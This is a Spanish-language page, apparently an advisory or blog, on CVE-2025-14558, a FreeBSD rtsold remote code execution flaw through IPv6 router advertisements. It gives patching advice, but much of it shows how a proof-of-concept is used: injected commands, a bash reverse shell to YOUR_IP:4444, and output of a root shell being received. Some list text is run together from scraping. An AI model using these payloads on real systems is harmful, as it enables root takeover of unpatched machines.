
CVE-2025-14558
CVE-2025-14558 es una vulnerabilidad crítica de Ejecución Remota de Código (RCE) que afecta a los sistemas FreeBSD que utilizan servicios de solicitud de enrutador IPv6. Una falla en la forma en que se maneja la entrada de red no confiable permite a los atacantes ejecutar comandos de shell arbitrarios.
rtsol(8)rtsold(8)resolvconf(8)Si se explota con éxito, un atacante puede:
Acciones fuertemente recomendadas:
rtsol / rtsold si no se requiere RA IPv6Cualquier sistema FreeBSD que escuche anuncios de enrutador IPv6 en una red no confiable corre un alto riesgo. Parchee inmediatamente o deshabilite los servicios afectados.
Si el script PoC para CVE-2025-14558 funciona correctamente en un sistema FreeBSD vulnerable (sin parchear, con rtsold en ejecución y procesando mensajes RA IPv6):
rtsold se ejecuta como root y llama a /sbin/resolvconf con el dominio malicioso).Para una prueba simple como --command "id > /tmp/pwned":
Se crea un archivo /tmp/pwned que contiene una salida como:
uid=0(root) gid=0(wheel) groups=0(wheel)
Para --command "touch /tmp/exploit_success":
/tmp/exploit_success.Para una shell inversa como --command "bash -i >& /dev/tcp/YOUR_IP/4444 0>&1":
Verifique en el objetivo con comandos como:
ls -l /tmp/pwned
cat /tmp/pwned
El script muestra:
[+] Sending malicious RA on eth0
[+] Injected command: id > /tmp/pwned
[+] Target must run vulnerable rtsold and process the RA
[+] Done. Check target for execution (e.g. /tmp/pwned)
Para shell inversa: si tiene éxito, su nc -lvnp 4444 recibe una conexión y una shell root:
listening on [any] 4444 ...
connect to [YOUR_IP] from (UNKNOWN) [target_ip] XXXXX
bash: cannot set terminal process groups: No job control in this shell
bash: no job control in this shell
root@vulnerable-host:~ #
(Ahora tiene una shell root: escriba comandos como id, whoami, etc.)
rtsold no se está ejecutando, no está en la misma red L2, el firewall bloquea los RA o IPv6 está deshabilitado.Esto solo es observable en un laboratorio controlado en un sistema FreeBSD vulnerable (anterior al parche del 16 de diciembre de 2025). No hay informes públicos de explotación en entornos reales al 23 de diciembre de 2025. Parchee inmediatamente en producción.